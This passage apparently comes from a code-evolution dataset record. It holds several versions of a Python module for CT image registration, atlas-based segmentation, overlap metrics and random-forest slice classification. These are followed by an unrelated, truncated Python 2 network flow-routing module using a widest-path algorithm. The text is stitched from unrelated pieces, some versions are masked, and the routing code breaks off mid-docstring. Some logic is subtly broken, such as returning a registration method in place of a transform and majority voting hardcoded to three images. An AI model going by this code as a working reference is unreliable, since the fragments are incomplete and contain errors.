"step-2": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\ndef slice_probability(ct_image, classifier):\n test_list = []\n max_list = []\n im_array = sitk.GetArrayFromImage(ct_image)\n im_array.resize((512, 512, 512))\n for z in range(im_array.shape[2]):\n test_list.append(im_array[:, :, z].flatten())\n test_array = np.asarray(test_list, dtype=np.uint8)\n probabilities = classifier.predict_proba(test_array)\n max = np.amax(probabilities, axis=0)[1]\n for i, prob in enumerate(probabilities):\n if prob[1] == max:\n max_list.append(i)\n if len(max_list) == 1:\n print('Slice {} has highest probability which is: {}'.format(\n max_list[0], max))\n else:\n print('Slices {} have the highest probability which is: {}'.format(\n max_list, max))\n return None\n",
"step-4": "import SimpleITK as sitk\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\ndef slice_probability(ct_image, classifier):\n test_list = []\n max_list = []\n im_array = sitk.GetArrayFromImage(ct_image)\n im_array.resize((512, 512, 512))\n for z in range(im_array.shape[2]):\n test_list.append(im_array[:, :, z].flatten())\n test_array = np.asarray(test_list, dtype=np.uint8)\n probabilities = classifier.predict_proba(test_array)\n max = np.amax(probabilities, axis=0)[1]\n for i, prob in enumerate(probabilities):\n if prob[1] == max:\n max_list.append(i)\n if len(max_list) == 1:\n print('Slice {} has highest probability which is: {}'.format(\n max_list[0], max))\n else:\n print('Slices {} have the highest probability which is: {}'.format(\n max_list, max))\n return None\n",
"step-5": "import SimpleITK as sitk\r\nimport numpy as np\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\n# # Estimation function # #\r\n# --------------------------- #\r\n# Linear registration function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# im_mov : The group image [numpy.ndarray]\r\n# mov_mask : List of GROUP masks [list]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# lin_xfm : Estimated transformation parameters [itk.simple.Transform]\r\n\r\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\r\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),\r\n sitk.CenteredTransformInitializerFilter.MOMENTS)\r\n\r\n # Initialize registration\r\n lin_transformation = sitk.ImageRegistrationMethod()\r\n\r\n # Set metrics\r\n lin_transformation.SetMetricAsMeanSquares()\r\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\r\n lin_transformation.SetMetricSamplingPercentage(0.01)\r\n\r\n # Set mask\r\n if mov_mask:\r\n lin_transformation.SetMetricMovingMask(mov_mask)\r\n\r\n # Gradient Descent optimizer\r\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,\r\n convergenceMinimumValue=1e-6, convergenceWindowSize=10)\r\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\r\n\r\n # Set the initial transformation\r\n lin_transformation.SetInitialTransform(initial_transform)\r\n\r\n # Switching to preferred variable\r\n lin_xfm = lin_transformation\r\n\r\n if show_parameters:\r\n print(lin_xfm)\r\n\r\n return lin_xfm\r\n\r\n\r\n# # Estimation function # #\r\n# --------------------------- #\r\n# Non-linear 'Demons' registration function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# fixed_mask : The mask of common image, default is None [numpy.ndarray]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# nl_xfm : Estimated transformation parameters [itk.simple.Transform]\r\n\r\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\r\n # Initialize the registration\r\n reg_method = sitk.ImageRegistrationMethod()\r\n\r\n # Create initial identity transformation.\r\n transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()\r\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\r\n initial_transform = sitk.DisplacementFieldTransform(\r\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\r\n\r\n # Regularization. The update field refers to fluid regularization; the total field to elastic regularization.\r\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)\r\n\r\n # Set the initial transformation\r\n reg_method.SetInitialTransform(initial_transform)\r\n\r\n # Set Demons registration\r\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\r\n\r\n # Evaluate the metrics only in the mask\r\n if fixed_mask is not None:\r\n reg_method.SetMetricFixedMask(fixed_mask)\r\n\r\n # Set a linear interpolator\r\n reg_method.SetInterpolator(sitk.sitkLinear)\r\n\r\n # Set a gradient descent optimizer\r\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,\r\n convergenceWindowSize=10)\r\n reg_method.SetOptimizerScalesFromPhysicalShift()\r\n\r\n # Switching to the preferred variable\r\n nl_xfm = reg_method\r\n\r\n if show_parameters:\r\n print(nl_xfm)\r\n\r\n return nl_xfm\r\n\r\n# # Application function # #\r\n# --------------------------- #\r\n# Executes either the linear or the non-linear function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# im_mov : The group image [numpy.ndarray]\r\n# trafo : The chosen transformation [numpy.ndarray]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# final_image : Returns the registered image [numpy.ndarray]\r\n\r\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\r\n # Perform registration (Executes it)\r\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))\r\n\r\n if show_parameters:\r\n print(transf)\r\n print(\"--------\")\r\n print(\"Optimizer stop condition: {0}\".format(trafo.GetOptimizerStopConditionDescription()))\r\n print(\"Number of iterations: {0}\".format(trafo.GetOptimizerIteration()))\r\n print(\"--------\")\r\n\r\n return transf\r\n\r\n\r\n# # Atlas segmentation function # #\r\n# --------------------------- #\r\n# Atlas-based segmentation using the CT images in 'ct_list'\r\n# and corresponding segmentation masks from 'seg_list'.\r\n# After that, majority voting to return a segmentation mask.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# common_img : The chosen COMMON image [sitk-image]\r\n# ct_list : List of GROUP images [list]\r\n# seg_list : List of GROUP masks [list]\r\n\r\n# --- Output --- #\r\n# segmented_array : The segmentation as an array [numpy.ndarray]\r\n\r\ndef seg_atlas(common_img, ct_list, seg_list):\r\n # Creating the necessary lists\r\n seg = []\r\n image_list = []\r\n\r\n # # REGISTRATION # #\r\n for i in range(len(ct_list)):\r\n # Adjusting the settings and applying\r\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)\r\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\r\n\r\n # Perform registration on mask image\r\n resampler = sitk.ResampleImageFilter()\r\n resampler.SetReferenceImage(common_img)\r\n resampler.SetInterpolator(sitk.sitkLinear)\r\n\r\n resampler.SetTransform(final_trafo)\r\n resampled_mask = resampler.Execute(seg_list[i])\r\n\r\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\r\n seg.append(resampled_mask_data)\r\n\r\n # # MAJORITY VOTING # #\r\n for i in range(len(seg)):\r\n for j in range(i + 1, len(seg)):\r\n arr1 = np.transpose(np.nonzero(seg[i]))\r\n arr2 = np.transpose(np.nonzero(seg[j]))\r\n\r\n # Filling two lists\r\n arr1list = [tuple(e) for e in arr1.tolist()]\r\n arr2list = [tuple(e) for e in arr2.tolist()]\r\n\r\n # Sorting both lists\r\n arr1list.sort()\r\n arr2list.sort()\r\n\r\n # Creating necessary list & sorting\r\n intersections = list(set(arr1list).intersection(arr2list))\r\n intersections.sort()\r\n\r\n image_list.append(intersections)\r\n # Creating a list which contains the indexes of intersecting voxels\r\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))\r\n\r\n # Sorting the list\r\n intersection_list.sort()\r\n\r\n # Fetches array from image\r\n image_array = sitk.GetArrayFromImage(common_img)\r\n\r\n # Creates an array for the points and fills it using indexes\r\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\r\n for x, y, z in intersection_list:\r\n segmented_array[x, y, z] = 1\r\n\r\n return segmented_array\r\n\r\n\r\n# # Similarity function # #\r\n# --------------------------- #\r\n# Calculates the following distances between images:\r\n# 1. Jaccard coef.\r\n# 2. Dice coef.\r\n# 3. Hausdorff distance\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# mask_img : The mask image [sikt-image]\r\n# seg_img: The segmented image [sikt-image]\r\n\r\n# --- Output --- #\r\n# None\r\n\r\ndef distances(mask_img, seg_img):\r\n # Creating the necessary filters\r\n hausdorff = sitk.HausdorffDistanceImageFilter()\r\n overlap = sitk.LabelOverlapMeasuresImageFilter()\r\n\r\n # Execute filters\r\n hausdorff.Execute(mask_img, seg_img)\r\n overlap.Execute(mask_img, seg_img)\r\n\r\n # Fetching the distances and appending to distance list\r\n # Jaccard coef.\r\n jaccard = overlap.GetJaccardCoefficient()\r\n\r\n # Dice coef.\r\n dice = overlap.GetDiceCoefficient()\r\n\r\n # Hausdorff distance\r\n hausdorff_distance = hausdorff.GetHausdorffDistance()\r\n\r\n # Printing out the distances for user\r\n print('The Hausdorff distance: {}'.format(\r\n hausdorff_distance))\r\n print('The Dice coefficient: {}'.format(dice))\r\n print('The Jaccard coefficient: {}'.format(jaccard))\r\n\r\n return None\r\n\r\n\r\n# # Classifier Function # #\r\n# --------------------------- #\r\n# Trains a random forest classifier by reading 2d images and comparing\r\n# them to a vector which has labels that correspond to if it contains\r\n# the pubic symphysis. The labels are binary.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# slice_list : List of 2D slice images [list]\r\n# vector_list : List of vectors with binary labels [list]\r\n\r\n# --- Output --- #\r\n# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]\r\n\r\ndef train_classifier(slice_list, vector_list):\r\n # Creating necessary list\r\n x_train_list = []\r\n\r\n # Reading in input data\r\n for image in slice_list:\r\n\r\n # Fetching arrays\r\n image_array = sitk.GetArrayFromImage(image)\r\n\r\n # Resizing\r\n image_array.resize((512, 512, 512))\r\n\r\n for z in range(image_array.shape[2]):\r\n x_train_list.append(image_array[:, :, z].flatten())\r\n x_train = np.asarray(x_train_list, dtype=np.uint8)\r\n\r\n # Reading in training labels\r\n y_train = None\r\n for i in range(0, len(vector_list)):\r\n if i == 0:\r\n y_train = vector_list[i]\r\n else:\r\n y_train = np.concatenate([y_train, vector_list[i]])\r\n\r\n # Train classifier\r\n trained_forest = RandomForestClassifier(n_estimators=150)\r\n trained_forest.fit(x_train, y_train)\r\n\r\n return trained_forest\r\n\r\n\r\n# # Classifier Function # #\r\n# --------------------------- #\r\n# Utilizes a trained random forest classifier by reading CT image and prints\r\n# which slice has the highest probability of containing the pubic symphysis.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# ct_image : List of 2D axial slice images [list]\r\n# classifier : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]\r\n\r\n# --- Output --- #\r\n# None\r\n\r\ndef slice_probability(ct_image, classifier):\r\n # Creating necessary lists\r\n test_list = []\r\n max_list = []\r\n\r\n # Convert image to numpy array & resize\r\n im_array = sitk.GetArrayFromImage(ct_image)\r\n im_array.resize((512, 512, 512))\r\n\r\n for z in range(im_array.shape[2]):\r\n test_list.append(im_array[:, :, z].flatten())\r\n test_array = np.asarray(test_list, dtype=np.uint8)\r\n\r\n # Predict probabilities for each slice\r\n probabilities = classifier.predict_proba(test_array)\r\n\r\n # Fetching array with maximum probabilities\r\n max = np.amax(probabilities, axis=0)[1]\r\n\r\n for i, prob in enumerate(probabilities):\r\n if prob[1] == max:\r\n max_list.append(i)\r\n\r\n # Print result to user\r\n if len(max_list) == 1:\r\n print(\"Slice {} has highest probability which is: {}\".format(max_list[0], max))\r\n else:\r\n print(\"Slices {} have the highest probability which is: {}\".format(max_list, max))\r\n\r\n return None\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from pulp import *
from collections import namedtuple
import networkx as nx
import itertools
from mcfpox.controller.lib import Flow, Hop
def get_host_from_ip(G, ip):
return next((i for i in G.nodes() if G.node[i].get('ip') == str(ip)), None)
# https://docs.python.org/2/library/itertools.html#recipes
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return itertools.izip(a, b)
def widest_path(G, src, dst):
S = set([src])
T = set([n for n in G.nodes() if n != src])
print S, T
N = G.nodes()
B = {}
for n in N:
b = {}
for k in N:
if k == n:
continue
try:
b[k] = G.edge[n][k]['capacity']
except KeyError:
b[k] = 0
B[n] = b
P = {n:[] for n in N}
while True:
k = None
highest = 0
neighbors = set([])
for n in S:
for m in G[n]:
if m in S:
continue
B[src][m] = G.edge[n][m]['capacity']
if B[src][m] > highest:
k = m
highest = B[src][m]
P[k] = P[n] + [k]
S.add(k)
T.remove(k)
if not T:
break
for n in T:
old = B[src][n]
new = min(B[src][k], B[k][n])
B[src][n] = max(old, new)
if new > old:
P[n] = P[k] + [n]
return P[dst]
def objective(graph, flows):
""" Return a list of paths through the graph for each flow.
Args:
graph:
A nx.Graph, annotated with network information including
IP addresses for hosts and port numbers for each link.
flows:
A list of mcfpox.controller.lib.Flow objects representing
5-tuples of flows to route through the network
Returns:
A dict mapping each flow in flows to a valid path through the graph.
The path is expressed as a list of mcfpox.controller.lib.Hop objects.
If no valid path can be found, the value for that entry is None.
"""
G = graph.copy()
rules = {}
flows.sort(key=lambda a: a[1], reverse=True)
for flow,demand in flows:
src = get_host_from_ip(G, flow.nw_src)
dst = get_host_from_ip(G, flow.nw_dst)
if not (src and dst):
continue
if not (src in G.nodes() and dst in G.nodes()):
continue
path = widest_path(G, src, dst)
hops = []
for a,b in pairwise(path):
hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))
G.edge[a][b]['capacity'] -= demand
G.edge[b][a]['capacity'] -= demand
rules[flow] = hops
return rules
|
normal
|
{
"blob_id": "65bcb4a2fbc05ee19c8a94811d369562ec5e72ff",
"index": 9261,
"step-1": "from pulp import *\nfrom collections import namedtuple\nimport networkx as nx\nimport itertools\nfrom mcfpox.controller.lib import Flow, Hop\n\n\ndef get_host_from_ip(G, ip):\n return next((i for i in G.nodes() if G.node[i].get('ip') == str(ip)), None)\n\n\n# https://docs.python.org/2/library/itertools.html#recipes\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = itertools.tee(iterable)\n next(b, None)\n return itertools.izip(a, b)\n\n\ndef widest_path(G, src, dst):\n S = set([src])\n T = set([n for n in G.nodes() if n != src])\n print S, T\n\n N = G.nodes()\n B = {}\n for n in N:\n b = {}\n for k in N:\n if k == n:\n continue\n try:\n b[k] = G.edge[n][k]['capacity']\n except KeyError:\n b[k] = 0\n B[n] = b\n P = {n:[] for n in N}\n\n while True:\n k = None\n highest = 0\n neighbors = set([])\n\n for n in S:\n for m in G[n]:\n if m in S:\n continue\n B[src][m] = G.edge[n][m]['capacity']\n if B[src][m] > highest:\n k = m\n highest = B[src][m]\n P[k] = P[n] + [k]\n\n S.add(k)\n T.remove(k)\n if not T:\n break\n\n for n in T:\n old = B[src][n]\n new = min(B[src][k], B[k][n])\n B[src][n] = max(old, new)\n if new > old:\n P[n] = P[k] + [n]\n\n return P[dst]\n\n\ndef objective(graph, flows):\n \"\"\" Return a list of paths through the graph for each flow.\n\n Args:\n graph: \n A nx.Graph, annotated with network information including\n IP addresses for hosts and port numbers for each link.\n flows: \n A list of 